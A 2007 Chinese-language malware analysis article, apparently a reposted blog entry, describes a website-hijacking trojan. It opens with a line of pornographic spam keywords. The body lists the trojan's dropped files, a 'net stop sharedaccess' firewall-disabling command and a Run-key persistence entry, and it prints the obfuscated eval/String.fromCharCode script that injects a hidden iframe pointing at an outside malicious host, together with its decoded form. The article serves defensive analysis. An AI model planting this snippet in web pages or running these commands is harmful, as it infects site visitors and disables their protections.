欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

解讀網(wǎng)站被掛其中木馬分析js+eval實現(xiàn)

 更新時間:2007年03月31日 00:00:00   投稿:mdxy-dxy  
解讀網(wǎng)站被掛其中木馬分析js+eval實現(xiàn)

在FF看到這消息.. 于是就把網(wǎng)頁解開了..
原來是"老朋友"刺客集團 .. 已經(jīng)多次和這個集團生成的網(wǎng)馬打交道了..

其中掛上一個木馬
hxxp://www.xxxx.com/pic/ddb/2006692151148920.gif

就此做個分析吧..
運行樣本.
釋放文件
C:\win30.exe
調(diào)用cmd 運行命令 /c net stop sharedaccess

訪問網(wǎng)站
61.129.102.79
地址應(yīng)該是:hxxp://www.xxxx.com 80端口通訊

下載:hxxp://www.xxxx.com/es86/db/dvbbs.mdb
此文件為rar 文件..

dvbbs.mdb 釋放出文件為
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eCompress.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eImgConverter.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eLIB.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\HideProc.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\internet.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\krnln.fnr
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\Nhook.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\shell.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe

寫入注冊表
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe"

在 htm 和 aspx 尾部加入代碼
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>

解密為
<script>
p="<iframe height=0 width=0 src="http://a-l.meibu.com/"></iframe>"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>

在線掃描
AntiVir 7.3.1.38 03.02.2007 TR/Crypt.NSPM.Gen 
BitDefender 7.2 03.02.2007 DeepScan:Generic.Malware.PWYddldPk.D212BB22 
eSafe 7.0.14.0 02.28.2007 suspicious Trojan/Worm 
F-Secure 6.70.13030.0 03.02.2007 W32/Downloader 
Ikarus T3.1.1.3 03.02.2007 Backdoor.Win32.Hupigon.BV 
NOD32v2 2090 03.02.2007 a variant of Win32/Delf.AG 
Norman 5.80.02 03.02.2007 W32/Downloader 
Panda 9.0.0.4 03.01.2007 Suspicious file 

以上分析都在虛擬機里完成的..
這次加的殼實在脫不開..無法查看更詳細..

不過猜測 編寫語言為 Borland Delphi 6.0 - 7.0
嘗試關(guān)閉一些安全軟件 估計也有..

=.= 再此感嘆..這什么破殼..

相關(guān)文章

最新評論